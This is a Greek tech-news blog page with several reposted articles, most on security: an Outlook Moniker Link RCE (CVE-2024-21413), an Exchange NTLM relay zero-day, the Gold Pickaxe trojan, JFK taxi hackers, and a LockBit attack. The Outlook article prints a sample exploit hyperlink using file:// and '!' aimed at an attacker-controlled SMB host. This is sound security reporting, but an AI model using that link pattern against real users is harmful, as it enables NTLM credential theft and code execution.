Αρχική Blog Σελίδα 399

Νέο κρίσιμο σφάλμα Moniker Link RCE στο Microsoft Outlook

Η Microsoft αναφέρει ότι απομακρυσμένοι μη πιστοποιημένοι επιτιθέμενοι μπορούν εύκολα να εκμεταλλευτούν μια κρίσιμη ευπάθεια ασφαλείας Moniker Link RCE στο Outlook, η οποία τους επιτρέπει επίσης να παρακάμψουν την προστατευμένη προβολή του Office.

Δείτε επίσης: Το κλασικό Outlook app ενδέχεται να καταργηθεί τα επόμενα δύο χρόνια

Microsoft Outlook RCE

Ανακαλύφθηκε από τον ερευνητή ευπαθειών της Check Point, Haifei Li, και είναι γνωστό ως CVE-2024-21413. Το σφάλμα Moniker Link οδηγεί στην εκτέλεση απομακρυσμένου κώδικα (RCE) κατά το άνοιγμα ηλεκτρονικών μηνυμάτων με κακόβουλους συνδέσμους, χρησιμοποιώντας μια ευπαθή έκδοση του Microsoft Outlook.

Αυτό συμβαίνει επειδή η αδυναμία επιτρέπει επίσης στους επιτιθέμενους να παρακάμψουν την Προστατευμένη Προβολή (σχεδιασμένη για να αποκλείει επιβλαβές περιεχόμενο που ενσωματώνεται σε αρχεία Office ανοίγοντάς τα σε λειτουργία μόνο για ανάγνωση) και να ανοίγουν κακόβουλα αρχεία Office σε λειτουργία επεξεργασίας.

Η εταιρεία προειδοποίησε επίσης ότι η προεπισκόπηση (Preview Pane) αποτελεί ένα διανύσμα επίθεσης για αυτήν την αδυναμία ασφαλείας, επιτρέποντας την εκμετάλλευση ακόμα και κατά την προεπισκόπηση κακόβουλων εγγράφων του Office.

Οι μη εξουσιοδοτημένοι επιτιθέμενοι μπορούν να εκμεταλλευτούν το CVE-2024-21413 απομακρυσμένα σε επιθέσεις χαμηλής πολυπλοκότητας που δεν απαιτούν αλληλεπίδραση με το χρήστη.

Το CVE-2024-21413 επηρεάζει πολλά προϊόντα Office, συμπεριλαμβανομένων του Microsoft Office LTSC 2021 και του Microsoft 365 Apps for Enterprise, καθώς επίσης και του Microsoft Outlook 2016 και του Microsoft Office 2019 (υπό επέκταση υποστήριξης).

Όπως εξηγεί το Check Point σε έκθεσή του που δημοσιεύτηκε σήμερα, η ευπάθεια Moniker Link RCE επιτρέπει σε επιτιθέμενους να παρακάμψουν τις ενσωματωμένες προστασίες του Microsoft Outlook για κακόβουλους συνδέσμους που ενσωματώνονται σε ηλεκτρονικά μηνύματα, χρησιμοποιώντας το πρωτόκολλο file:// και προσθέτοντας ένα θαυμαστικό στις διευθύνσεις URL που δείχνουν σε διακομιστές που ελέγχονται από τον επιτιθέμενο.

Δείτε ακόμα: Outlook prompts: Διορθώνονται για να ανοίξουν τα κλειστά παράθυρα

Το θαυμαστικό προστίθεται αμέσως μετά την επέκταση του εγγράφου, μαζί με κάποιο τυχαίο κείμενο, όπως φαίνεται παρακάτω:

*<a href=”file:///\\10.10.111.111\test\test.rtf!something”>CLICK ME</a>*

Αυτός ο τύπος hyperlink παρακάμπτει τον περιορισμό ασφαλείας του Outlook, και το Outlook θα έχει πρόσβαση στο απομακρυσμένο πόρο “\\10.10.111.111\test\test.rtf” όταν γίνει κλικ στον σύνδεσμο χωρίς να εκδώσει κάποια προειδοποίηση ή σφάλμα.

Το σφάλμα προέκυψε λόγω της μη ασφαλούς API MkParseDisplayName, επομένως η ευπάθεια μπορεί να επηρεάσει και άλλο λογισμικό που τη χρησιμοποιεί.

Οι επιπτώσεις από επιθέσεις που εκμεταλλεύονται με επιτυχία το CVE-2024-21413 περιλαμβάνουν την κλοπή πληροφοριών NTLM και την εκτέλεση αυθαίρετου κώδικα μέσω κακόβουλα διαμορφωμένων εγγράφων Office.

Η Microsoft ενημέρωσε σήμερα την ανακοίνωση ασφαλείας CVE-2024-21413 για να προειδοποιήσει ότι αυτό το πρόβλημα στο Outlook εκμεταλλεύεται επίσης σε επιθέσεις zero-day πριν από την Patch Tuesday του μήνα αυτού.

Ωστόσο, η εταιρεία επέστρεψε την αλλαγή, αναφέροντας ότι “ανανέωσε λανθασμένα τη σημαία εκμετάλλευσης και την αξιολόγηση εκμεταλλευσιμότητας για να υποδείξει την ύπαρξη εκμετάλλευσης“.

Δείτε επίσης: Microsoft Outlook: Οι ενημερώσεις Δεκεμβρίου προκαλούν ειδοποιήσεις ασφαλείας ICS

Τι είναι το Remote Code Execution flaw;

Το Remote Code Execution (RCE) flaw είναι μια ευπάθεια που επιτρέπει σε έναν επιτιθέμενο να εκτελέσει απομακρυσμένα κώδικα σε ένα σύστημα. Αυτό σημαίνει ότι ο επιτιθέμενος μπορεί να πάρει τον έλεγχο του συστήματος και να το χρησιμοποιήσει για τους δικούς του σκοπούς. Η ευπάθεια RCE μπορεί να προκύψει από διάφορες πηγές, όπως λάθη στον προγραμματισμό, κακή διαχείριση των δεδομένων εισόδου ή ακόμη και από την ανεπαρκή διαχείριση των δικαιωμάτων των χρηστών. Αυτά τα λάθη μπορούν να εκμεταλλευτούν οι επιτιθέμενοι για να εκτελέσουν κώδικα στο σύστημα του θύματος.

Για να αντιμετωπίσετε τις ευπάθειες RCE, είναι σημαντικό να εφαρμόζετε τακτικά ενημερώσεις και διορθώσεις ασφαλείας στο σύστημά σας. Επίσης, η χρήση εργαλείων ανίχνευσης ευπαθειών και η διεξαγωγή τακτικών ελέγχων ασφαλείας μπορεί να βοηθήσει στην ανακάλυψη και την αποτροπή των επιθέσεων RCE. Τέλος, η εκπαίδευση του προσωπικού σας σχετικά με τις καλές πρακτικές ασφαλείας, όπως η αποφυγή κλικ σε ύποπτους συνδέσμους, μπορεί να μειώσει σημαντικά τον κίνδυνο εκμετάλλευσης των ευπαθειών RCE.

Πηγή: bleepingcomputer

Μήνυση σε εταιρείες social media για την αρνητική επίδραση στην ψυχική υγεία των νέων

Ο δήμαρχος της Νέας Υόρκης, Eric Adams, ανακοίνωσε ότι η κυβέρνησή του έχει καταθέσει μήνυση εναντίον μεγάλων εταιρειών social media για την αρνητική επίδραση στην ψυχική υγεία των νέων.

μήνυση social media ψυχική υγεία

Η αγωγή περιλαμβάνει τις μητρικές εταιρείες Meta του Facebook και του Instagram, καθώς και τη Google του YouTube (νομικά γνωστή ως Alphabet), την Snap Inc. του Snapchat και την ByteDance του TikTok. Η μήνυση κατατέθηκε στο Ανώτατο Δικαστήριο της Καλιφόρνια και ισχυρίζεται ότι οι εταιρείες σχεδίασαν επίτηδες τις πλατφόρμες τους με σκοπό να “επηρεάσουν εσκεμμένα και να εθίσουν παιδιά και έφηβους σε social media εφαρμογές”.

Δείτε επίσης: Εφοριακοί συμμετείχαν σε απάτη μέσω social media

Τα τελευταία δέκα χρόνια, μαρτυρήσαμε πόσο εθιστικός και κατακλυστικός μπορεί να είναι ο διαδικτυακός κόσμος, εκθέτοντας τα παιδιά μας σε μια συνεχή ροή περιεχομένου που είναι επιβλαβής και τροφοδοτεί την εθνική μας κρίση στην ψυχική υγεία. Αυτή η δήλωση προήλθε από τον Άνταμς και επισημαίνει την ανάγκη για επίγνωση και δράση.

Δεν είναι η πρώτη φορά που οι γίγαντες των κοινωνικών δικτύων αντιμετωπίζουν ανάλογες αγωγές. Οι ρυθμιστικές αρχές τους πιέζουν να προστατεύσουν τα παιδιά από επιβλαβές περιεχόμενο, θέτοντας τους υπό έντονο έλεγχο. Η Meta, το TikTok και το YouTube αντιμετωπίζουν πλέον εκατοντάδες αγωγές που έχουν κατατεθεί για λογαριασμό παιδιών και σχολικών περιοχών, σχετικά με τον εθισμό στα social media, σύμφωνα με την έκθεση.

Πριν από μόλις ένα μήνα, ο διευθύνων σύμβουλος της Meta, Mark Zuckerberg, ζήτησε συγγνώμη από τις οικογένειες κατά τη διάρκεια της ακρόασης στη Γερουσία των Ηνωμένων Πολιτειών, αναφορικά με τον αντίκτυπο που έχουν τα social media στα παιδιά.

Σύμφωνα με τη δήλωση των εκπροσώπων τους, η Meta εκφράζει την επιθυμία να παρέχονται στους έφηβους “ασφαλείς και κατάλληλες για την ηλικία τους εμπειρίες στο διαδίκτυο”, ενώ το TikTok δηλώνει ότι θα συνεχίσει τις προσπάθειές της για να διατηρήσει μια ασφαλή κοινότητα, αντιμετωπίζοντας τα προβλήματα που δημιουργούνται.

μήνυση social media ψυχική υγεία

Διαβάστε ακόμη: Taylor Swift: Ακατάλληλες AI-generated φωτογραφίες διαδόθηκαν στα social media

Η Alphabet αρνήθηκε τις κατηγορίες, δηλώνοντας: “Έχουμε δημιουργήσει υπηρεσίες και πολιτικές που προσφέρουν στους νέους κατάλληλες εμπειρίες για την ηλικία τους, καθώς και ισχυρούς ελέγχους για τους γονείς τους. Οι ισχυρισμοί που αναφέρονται σε αυτή την καταγγελία είναι απλά αβάσιμοι”, εξήγησε ο εκπρόσωπος της Google, Jose Castaneda, σε δήλωσή του.

Πηγή: phonearena.com

Αεροδρόμιο JFK: Οδηγοί ταξί καταδικάστηκαν για χάκινγκ επίθεση

Δύο οδηγοί ταξί καταδικάστηκαν σε φυλάκιση για τη συμμετοχή τους σε ένα σχέδιο πειρατείας που επηρέαζε το σύστημα αποστολής ταξί προς το διεθνές αεροδρόμιο Τζον Φ. Κένεντι (JFK), σύμφωνα με ανακοίνωση του υπουργείου Δικαιοσύνης των ΗΠΑ τη Δευτέρα.

JFK hackers

Οι δύο χάκερς είναι ο Daniel Abayev, ο οποίος έχει καταδικαστεί σε φυλάκιση για τέσσερα χρόνια, και ο Peter Leyman, που καταδικάστηκε σε δύο χρόνια φυλάκισης. Επιπλέον, τους καταδικάστηκε σε τρία χρόνια εποπτευόμενης απελευθέρωσης, και καλούνται να καταβάλουν χρηματικό ποσό ύψους 160.000 δολαρίων, καθώς και περίπου 3,5 εκατομμύρια δολάρια ως αποζημίωση.

Δείτε επίσης: Ρώσοι, Κινέζοι και Ιρανοί χρησιμοποιούν AI εργαλεία για να βελτιώσουν τις ικανότητές τους στο hacking

Ο Abayev και ο Leyman, δύο πολίτες των ΗΠΑ που ζούν στη Νέα Υόρκη, παραδέχθηκαν την ενοχή τους τον Οκτώβριο του 2023 για συνωμοσία σχετικά με τη διάπραξη εισβολής σε υπολογιστή.

Σύμφωνα με τους ερευνητές, ο Abayev και ο Leyman, συνεργάστηκαν με δύο Ρώσους υπηκόους, τους Aleksandr Derebenetc και Kirill Shipulin, από τον Σεπτέμβριο του 2019 έως τον Σεπτέμβριο του 2021. Οι Ρώσοι υπήκοοι διαπράττοντας παράνομες ενέργειες, εισέβαλαν στο σύστημα αποστολής ταξί του αεροδρομίου JFK και ανακατεύθυναν ταξί όπου οι οδηγοί είχαν ήδη πληρώσει στους δύο δράστες Abayev και Leyman.

Στο JFK, τα ταξί πρέπει να αναμένουν σε μια περιοχή αναμονής πριν αποσταλούν στον αντίστοιχο τερματικό σταθμό, με βάση την άφιξή τους. Ορισμένα ταξί μπορεί να αναγκαστούν να περιμένουν αρκετές ώρες πριν αποσταλούν, αλλά υπήρχαν οδηγοί που αγνόησαν το πρόγραμμα και προσπέρασαν την ουρά.

Σύμφωνα με τις αρχές, μέχρι και 1.000 ταξί αποστέλλονταν καθημερινά μπροστά στη γραμμή μέσω αυτού του συστήματος, με τους οδηγούς να πληρώνουν 10 δολάρια κάθε φορά που παραβιάζουν τη γραμμή.

JFK hackers

Διαβάστε περισσότερα: Facebook Marketplace: Διαρροή δεδομένων σε hacking forum

Σύμφωνα με το Υπουργείο Δικαιοσύνης, οι χάκερς προσπάθησαν να αναλάβουν τον έλεγχο του συστήματος αποστολής ταξί χρησιμοποιώντας διάφορες μεθόδους όπως Wi-Fi, κλεμμένα tablet συνδεδεμένα στο σύστημα αποστολής και δωροδοκία για τη δημιουργία κακόβουλου λογισμικού σε υπολογιστές που είναι συνδεδεμένοι με το σύστημα.

Οι Ρώσοι χάκερς παραμένουν ελεύθεροι, δήλωσε το υπουργείο Δικαιοσύνης.

Πηγή: securityweek.com

Η Mozilla προχωρά σε απολύσεις και αναδιοργάνωση

Η Mozilla πρόσφατα προχώρησε στην ανάθεση νέου διευθυντή εκτελεστικού συμβουλίου και φαίνεται ότι επικεντρώνεται σε μια αναδιοργάνωση, απολύοντας 60 άτομα και καταργώντας ορισμένα προϊόντα.

Mozilla αναδιοργάνωση πρόγραμμα περιήγησης

Παρά το ιστορικό της ως πρόγραμμα περιήγησης, η Mozilla έχει διευρύνει πρόσφατα τις υπηρεσίες της σε διάφορους τομείς, όπως ο έλεγχος παραβίασης δεδομένων, το VPN και άλλες. Ανταγωνίζεται μεγάλες εταιρείες, όπως η Apple, η Google και η Microsoft, ενώ ο Firefox αποτελεί σημαντικό μέρος του διαδικτύου. Παρά τα έσοδα από τη Google, η Mozilla αντιμετωπίζει οικονομικές προκλήσεις. Αν και η εστίαση στον Firefox θα μπορούσε να είναι προτεραιότητα, η εταιρεία αντιμετωπίζει δυσκολίες στην επίτευξη αυτού του στόχου.

Διαβάστε επίσης: Mozilla: Πλαστές λήψεις του Thunderbird παραδίδουν κακόβουλο λογισμικό

Η Mozilla Corporation αποκομίζει περίπου το 80% των εσόδων της από την Google, η οποία είναι επίσης ο κύριος ανταγωνιστής της στον τομέα των προγραμμάτων περιήγησης, μέσω μιας συμφωνίας αναζήτησης. Αυτό υποδηλώνει ότι η Mozilla δεν βρίσκεται σε ισχυρή οικονομική θέση. Ωστόσο, πρωτοβουλίες που δεν σχετίζονται με προγράμματα περιήγησης μπορούν να αναπτυχθούν ως μια πιο ανθεκτική πηγή εσόδων. Μέχρι στιγμής, καμία από αυτές δεν έχει σημαντικές επιπτώσεις στην οικονομική τους κατάσταση.

Η Mozilla ανακοίνωσε εσωτερικές στρατηγικές αλλαγές, με την προσοχή να επικεντρώνεται σε νέες τάσεις. Αποφάσισε να αποσύρει προϊόντα όπως το “mozilla.social” και το “Mozilla Hubs” λόγω της μειωμένης ζήτησης. Συγχρόνως, προχωρά σε περικοπές θέσεων εργασίας στη “MozProd”.

Η προτεραιότητα τώρα είναι να ενσωματωθεί η τεχνητή νοημοσύνη (AI) στον Firefox, μετά την εξαγορά της εταιρείας Fakespot. Παρά την ύπαρξη ερμηνειών που επικεντρώνονται στον Firefox ως κύριο πεδίο δράσης, δεν υπάρχουν σαφείς ένδειξεις για περαιτέρω επενδύσεις. Ωστόσο, η Mozilla επιδιώκει να προσαρμοστεί στις εξελίξεις, αναζητώντας την επόμενη μεγάλη τάση μετά την αποτυχία στον τομέα της εικονικής πραγματικότητας (VR) και του metaverse.

Οργανωτικές αλλαγές περιλαμβάνουν τη συγχώνευση των ομάδων υποστήριξης περιεχομένου και AI/ML με τον Οργανισμό Firefox. Παρόλο που υπάρχει η ένδειξη για πιθανή επαναφορά της εστίασης στον Firefox, δεν δίνεται σαφής δέσμευση για περαιτέρω επενδύσεις. Αντ’ αυτού, τονίζεται ότι η προηγούμενη προσήλωση στον Firefox δεν είχε συναφή αποτελέσματα.

Mozilla αναδιοργάνωση firefox

Δείτε περισσότερα: Firefox για Android: Υποστηρίζει ξανά επεκτάσεις

Καθώς η Mozilla αντιμετωπίζει νέες προκλήσεις και μειώνεται το μερίδιο αγοράς του Firefox, επικεντρώνεται στην τεχνητή νοημοσύνη και εξερευνά νέες ευκαιρίες για ανάπτυξη.

Πηγή: arstechnica.com

Microsoft: Κρίσιμη ευπάθεια στον Exchange Server χρησιμοποιήθηκε ως zero-day

Η Microsoft προειδοποίησε για μια κρίσιμη ευπάθεια στον Exchange Server που χρησιμοποιήθηκε ως zero-day, πριν επιδιορθωθεί στο Patch Tuesday που κυκλοφόρησε την Τρίτη.

Microsoft Exchange Server zero-day ευπάθεια

Το σφάλμα ανακαλύφθηκε εσωτερικά και παρακολουθείται ως CVE-2024-21410. Επιτρέπει σε απομακρυσμένους μη επαληθευμένους χρήστες να αποκτήσουν περισσότερα προνόμια για NTLM relay επιθέσεις που στοχεύουν ευάλωτες εκδόσεις του Microsoft Exchange Server.

Σε τέτοιες επιθέσεις, ο επιτιθέμενος αναγκάζει μια συσκευή δικτύου (συμπεριλαμβανομένων των διακομιστών ή των domain controllers) να πραγματοποιήσει έλεγχο ταυτότητας έναντι ενός NTLM relay server που βρίσκεται υπό τον έλεγχό τους, για να μιμηθεί τις στοχευμένες συσκευές και να αυξήσει τα δικαιώματα.

Δείτε επίσης: Microsoft Patch Tuesday Φεβρουαρίου 2024: Διορθώνονται 73 ευπάθειες

Ένας εισβολέας θα μπορούσε να στοχεύσει έναν NTLM client, όπως το Outlook, με ένα NTLM credentials-leaking type vulnerability“, εξηγεί η Microsoft.

Τα credentials που διαρρέουν μπορούν στη συνέχεια να αναμεταδοθούν στον Exchange server για την απόκτηση δικαιωμάτων ως victim client και την εκτέλεση λειτουργιών στον Exchange server για λογαριασμό του θύματος“.

Η επιτυχημένη εκμετάλλευση της ευπάθειας θα μπορούσε να αναμεταδώσει το Net-NTLMv2 hash ενός χρήστη σε έναν ευάλωτο Exchange Server για έλεγχο της ταυτότητας του χρήστη.

Επομένως, η εκμετάλλευση της ευπάθειας CVE-2024-21410 μπορεί να οδηγήσει σε αυξημένο κίνδυνο για την ασφάλεια των δεδομένων. Οι παράγοντες απειλών μπορούν να παρακάμψουν τα μέτρα ασφαλείας και να αποκτήσουν πρόσβαση σε ευαίσθητες πληροφορίες.

Επιπλέον, η εκμετάλλευση αυτής της ευπάθειας θα μπορούσε ενδεχομένως να επιτρέψει στους επιτιθέμενους να επιτεθούν σε άλλα συστήματα που είναι συνδεδεμένα με τον ευάλωτο διακομιστή.

Δείτε επίσης: Zoom: Προειδοποιεί για κρίσιμη ευπάθεια – Κάντε άμεσα update!

Τέλος, η εκμετάλλευση αυτής της ευπάθειας μπορεί να οδηγήσει σε απώλεια της εμπιστοσύνης των πελατών και των εταίρων, καθώς η παραβίαση της ασφάλειας μπορεί να έχει σοβαρές επιπτώσεις στην εταιρική φήμη και την αξιοπιστία.

Κρίσιμη ευπάθεια στον Exchange Server χρησιμοποιήθηκε ως zero-day

Exchange Extended Protection

Η ενημερωμένη έκδοση του Exchange Server 2019 (Cumulative Update 14 (CU14) update) αντιμετωπίζει το ζήτημα ασφαλείας ενεργοποιώντας τα NTLM credentials Relay Protections (γνωστό και ως Extended Protection for Authentication ή EPA).

Αυτές οι προστασίες ενισχύουν τη λειτουργικότητα ελέγχου ταυτότητας του Windows Server μετριάζοντας τις authentication relay και man-in-the-middle (MitM) επιθέσεις.

Η Microsoft ανακοίνωσε χθες ότι η Εκτεταμένη Προστασία (Extended Protection-EP) θα ενεργοποιηθεί αυτόματα από προεπιλογή σε όλους τους Exchange servers μετά την εγκατάσταση του 2024 H1 Cumulative Update (aka CU14) αυτού του μήνα.

Δείτε επίσης: Νέες ευπάθειες στις υπηρεσίες Azure HDInsight Spark, Kafka και Hadoop

Οι διαχειριστές μπορούν να χρησιμοποιήσουν το ExchangeExtendedProtectionManagement PowerShell script για να ενεργοποιήσουν το EP σε προηγούμενες εκδόσεις του Exchange Server, ώστε να προστατευτούν από πιθανή εκμετάλλευση της ευπάθειας CVE-2024-21410.

Ωστόσο, πριν από την εναλλαγή EP στους διακομιστές Exchange, οι διαχειριστές θα πρέπει να αξιολογήσουν τα περιβάλλοντά τους και να ελέγξουν τα ζητήματα που αναφέρονται στην έκθεση της Microsoft για το EP toggle script. Ο έλεγχος είναι απαραίτητος για να αποφευχθούν πιθανά προβλήματα λειτουργικότητας.

Πηγή: www.bleepingcomputer.com

Το Gold Pickaxe trojan κλέβει το πρόσωπό σας για απάτες με deepfakes

Ένα νέο trojan που επηρεάζει iOS και Android συσκευές, με το όνομα ‘Gold Pickaxe‘, χρησιμοποιεί social engineering για να εξαπατήσει τα θύματα να σαρώσουν τα πρόσωπά τους και πιστεύεται ότι στη συνέχεια τα χρησιμοποιεί για τη δημιουργία deepfakes για μη εξουσιοδοτημένη πρόσβαση σε τραπεζικά συστήματα.

Δείτε επίσης: Το Coyote banking trojan έχει μολύνει 61 τραπεζικές εφαρμογές

Gold Pickaxe trojan deepfakes

Το νέο κακόβουλο λογισμικό, που εντοπίστηκε από την Group-IB, αποτελεί μέρος μιας malware suite που αναπτύχθηκε από την κινεζική ομάδα απειλών γνωστή ως ‘GoldFactory‘, η οποία ευθύνεται για άλλες παραλλαγές κακόβουλου λογισμικού όπως το ‘Gold Digger‘, το ‘Gold Digger Plus‘ και το ‘Gold Kefu‘.

Η Group-IB αναφέρει ότι οι αναλυτές της παρατήρησαν επιθέσεις που στόχευαν κυρίως την περιοχή της Ασίας-Ειρηνικού και πιο συχνά την Ταϊλάνδη και το Βιετνάμ. Ωστόσο, οι τεχνικές που χρησιμοποιήθηκαν μπορεί να είναι αποτελεσματικές παγκοσμίως και υπάρχει κίνδυνος να υιοθετηθούν από άλλες ποικιλίες κακόβουλου λογισμικού. Η διανομή του Gold Pickaxe ξεκίνησε τον Οκτώβριο του 2023 και συνεχίζει. Θεωρείται μέρος μιας εκστρατείας της GoldFactory που ξεκίνησε τον Ιούνιο του 2023 με το Gold Digger.

Τα θύματα λαμβάνουν μηνύματα phishing ή smishing στην εφαρμογή LINE που είναι γραμμένα στην τοπική τους γλώσσα, προσποιούμενα κυβερνητικές αρχές ή υπηρεσίες. Οι μηνύματα προσπαθούν να τους εξαπατήσουν να εγκαταστήσουν πλαστές εφαρμογές, όπως μια πλαστή εφαρμογή ‘Ψηφιακού Συνταξιοδοτικού’ που φιλοξενείται σε ιστότοπους που παριστάνουν το Google Play.

Για τους χρήστες του iOS (iPhone), οι κακόβουλοι παράγοντες χρησιμοποιούσαν αρχικά ένα URL του TestFlight για να εγκαταστήσουν την κακόβουλη εφαρμογή, επιτρέποντας τους να παρακάμψουν την κανονική διαδικασία αξιολόγησης ασφαλείας.

Όταν η Apple αφαίρεσε την εφαρμογή TestFlight, οι επιτιθέμενοι στράφηκαν στο να παρασύρουν τους στόχους να κατεβάσουν ένα κακόβουλο προφίλ Διαχείρισης Κινητής Συσκευής (MDM) που επιτρέπει στους δράστες να αποκτήσουν τον έλεγχο των συσκευών.

Δείτε ακόμα: 10 νέα Android banking trojans εμφανίστηκαν μέσα στο 2023

Μετά την εγκατάσταση του trojan Gold Pickaxe σε μία συσκευή με τη μορφή μιας πλαστής κυβερνητικής εφαρμογής, λειτουργεί ημι-αυτόνομα, παρεμβαίνοντας στις λειτουργίες στο παρασκήνιο, καταγράφοντας το πρόσωπο του θύματος για τη δημιουργία deepfakes, παρεμβαίνοντας στα εισερχόμενα SMS, αιτούμενος εγγράφατα ταυτότητας και δρομολογώντας την κίνηση του δικτύου μέσω της μολυσμένης συσκευής χρησιμοποιώντας το ‘MicroSocks‘.

Η Group-IB αναφέρει ότι η Android έκδοση του trojan Gold Pickaxe πραγματοποιεί περισσότερες κακόβουλες δραστηριότητες από την iOS, λόγω των υψηλότερων περιορισμών ασφαλείας της Apple. Επιπλέον, στο Android, το trojan χρησιμοποιεί πάνω από 20 διαφορετικές πλαστές εφαρμογές για κάλυψη.

Για παράδειγμα, το Gold Pickaxe μπορεί επίσης να εκτελεί εντολές σε Android για πρόσβαση σε SMS, περιήγηση στο σύστημα αρχείων, εκτέλεση κλικ στην οθόνη, μεταφόρτωση των 100 πιο πρόσφατων φωτογραφιών από το άλμπουμ του θύματος, λήψη και εγκατάσταση επιπλέον πακέτων, καθώς και αποστολή πλαστών ειδοποιήσεων.

Η χρήση των προσώπων των θυμάτων για τραπεζική απάτη είναι μια υπόθεση της Group-IB, που επιβεβαιώνεται επίσης από την Ταϊλανδική αστυνομία, βασισμένη στο γεγονός ότι πολλά χρηματοπιστωτικά ιδρύματα πρόσθεσαν βιομετρικούς ελέγχους το περασμένο έτος για συναλλαγές άνω ενός συγκεκριμένου ποσού.

Είναι απαραίτητο να διευκρινιστεί ότι το Gold Pickaxe trojan μπορεί να κλέψει εικόνες από τα τηλέφωνα iOS και Android που δείχνουν το πρόσωπο του θύματος (για deepfakes) και να εξαπατήσει τους χρήστες που αποκαλύπτουν το πρόσωπό τους σε βίντεο μέσω social engineering, χωρίς όμως να αποσπάσει δεδομένα Face ID ή να εκμεταλλευτεί οποιαδήποτε ευπάθεια στα δύο λειτουργικά συστήματα.

Τα βιομετρικά δεδομένα που αποθηκεύονται στις ασφαλείς θηκες των συσκευών είναι εξακριβωμένα κρυπτογραφημένα και πλήρως απομονωμένα από τις εκτελούμενες εφαρμογές.

Δείτε επίσης: Chameleon banking trojan: Νέα παραλλαγή παρακάμπτει βιομετρικούς ελέγχους

Ποια είναι η λειτουργία των banking trojan;

Τα banking trojan είναι κακόβουλα λογισμικά που σχεδιάζονται για να κλέψουν τις τραπεζικές πληροφορίες των χρηστών. Αυτά τα λογισμικά εισβάλλουν στον υπολογιστή του χρήστη, συχνά μέσω επιθέσεων phishing ή μέσω επισυναπτόμενων αρχείων σε ανεπιθύμητα μηνύματα ηλεκτρονικού ταχυδρομείου.

Μόλις εγκατασταθεί, το banking trojan αρχίζει να παρακολουθεί τις δραστηριότητες του χρήστη, όπως την πλοήγηση στο διαδίκτυο και την εισαγωγή κωδικών πρόσβασης. Οι πληροφορίες που συλλέγονται στη συνέχεια μεταφέρονται στον επιτιθέμενο.

Τα banking trojan μπορούν επίσης να χρησιμοποιηθούν για να εγκαταστήσουν άλλα κακόβουλα λογισμικά στον υπολογιστή του χρήστη, όπως ransomware ή spyware. Αυτό μπορεί να οδηγήσει σε περαιτέρω προβλήματα ασφαλείας, όπως η απώλεια προσωπικών ή ευαίσθητων δεδομένων.

Η καλύτερη άμυνα είναι η πρόληψη. Οι χρήστες πρέπει να είναι προσεκτικοί με τα μηνύματα ηλεκτρονικού ταχυδρομείου που λαμβάνουν, να μην κάνουν κλικ σε ύποπτους συνδέσμους και να χρησιμοποιούν αξιόπιστο λογισμικό ασφαλείας για να προστατεύσουν τους υπολογιστές τους.

Πηγή: bleepingcomputer

Το Google One «παίζει κρυφτό» με το πρόγραμμα των 200 GB

Φαίνεται ότι η Google προωθεί περισσότερο το νέο επίπεδο συνδρομής της υπηρεσίας AI του Google One, απ’ ότι το τυπικό πρόγραμμα των 200 GB.

Google One

Όπως αναφέρει αρχικά το Google Watch Blog, φαίνεται ότι η Google κρύβει το μηνιαίο πρόγραμμα των 3 δολαρίων για 200 GB. Αυτό σημαίνει ότι αν εκμεταλλευτείτε πλήρως το πρόγραμμα των 100 GB, θα μεταβείτε αυτόματα στο πακέτο των 2 TB.

Διαβάστε περισσότερα: Το Google One ξεπέρασε τους 100 εκατομμύρια συνδρομητές

Το Android Central επιβεβαιώνει ότι το τυπικό πρόγραμμα έχει εξαφανιστεί από τον ιστότοπο του Google One. Αυτό συμβαίνει είτε είστε συνδεδεμένοι είτε όχι στον λογαριασμό σας.

Ο ιστότοπος εμφανίζει μόνο το πρόγραμμα στο οποίο βρίσκεστε αυτή τη στιγμή κατά τη σύνδεσή σας και, στη συνέχεια, αλλάζει αυτόματα στο πρόγραμμα 2 TB. Όταν αποσυνδεθείτε, το πρόγραμμα των 200 GB παραλείπεται και εμφανίζεται μόνο το δωρεάν επίπεδο των 15 GB και το πρόγραμμα των 100 GB δίπλα στο τυπικό επίπεδο 2 TB.

Περιέργως, το πακέτο των 200 GB εξακολουθεί να εμφανίζεται στην εφαρμογή Google One, αν και είναι λιγότερο εμφανές. Για να δείτε τις άλλες διαθέσιμες επιλογές, θα πρέπει να κάνετε κύλιση προς τα κάτω και να επιλέξετε “Δείτε περισσότερα πλάνα”. Σε αυτά περιλαμβάνονται οι τυπικές επιλογές των 200 GB και οι βασικές επιλογές των 100 GB.

Παρά την όλη σύγχυση, ένα πράγμα παραμένει ξεκάθαρο: το Google One δεν έχει ακυρώσει με κανένα τρόπο το πρόγραμμα των 200 GB. Έτσι, εξακολουθείτε να μπορείτε να χρησιμοποιήσετε την εφαρμογή για κινητά, εάν είστε συνδρομητής ενός από τα πιο ακριβά προγράμματα.

Google One 200 GB

Δείτε επίσης: Sundar Pichai: Το Google One έχει σχεδόν 100 εκατ. συνδρομητές

Υπάρχουν φήμες ότι η Google κρατάει το πρόγραμμα των 200 GB μακριά από το οπτικό πεδίο των νέων χρηστών, προωθώντας το AI Premium επίπεδο των 2 TB στο επίκεντρο. Είναι λογικό, αφού ο γίγαντας της αναζήτησης μόλις κυκλοφόρησε αυτό το νέο πρόγραμμα με το Gemini Advanced, επισημαίνοντας την αυξανόμενη προσήλωσή του στην παροχή παραγωγικών δυνατοτήτων της τεχνητής νοημοσύνης για να ανταγωνιστεί το OpenAI.

Πηγή: androidcentral.com

Η ransomware ομάδα LockBit λέει ότι επιτέθηκε στην Κομητεία Fulton

Η συμμορία ransomware LockBit ισχυρίζεται ότι βρίσκεται πίσω από την πρόσφατη κυβερνοεπίθεση στην κομητεία Fulton της Georgia. Επιπλέον, οι hackers λένε ότι έχουν κλέψει “εμπιστευτικά” έγγραφα και απειλούν να τα δημοσιεύσουν εάν δεν λάβουν τα λύτρα που έχουν ζητήσει.

LockBit ransomware Κομητεία Fulton

Η κομητεία Fulton είναι η μεγαλύτερη κομητεία στη Georgia με πληθυσμό πάνω από ένα εκατομμύριο κατοίκους.

Η ransomware ομάδα LockBit παραβίασε τα συστήματα της κομητείας το τελευταίο Σαββατοκύριακο του Ιανουαρίου, διαταράσσοντας συστήματα IT και προκαλώντας προβλήματα σε τηλεφωνικά, δικαστικά και φορολογικά συστήματα.

Δείτε επίσης: Η ransomware συμμορία LockBit λέει ότι χάκαρε τη Subway

Σχεδόν τρεις εβδομάδες μετά το συμβάν, ο ιστότοπος της τοπικής κυβέρνησης εξακολουθεί να δείχνει μια ειδοποίηση σχετικά με τη διακοπή λειτουργίας του συστήματος.

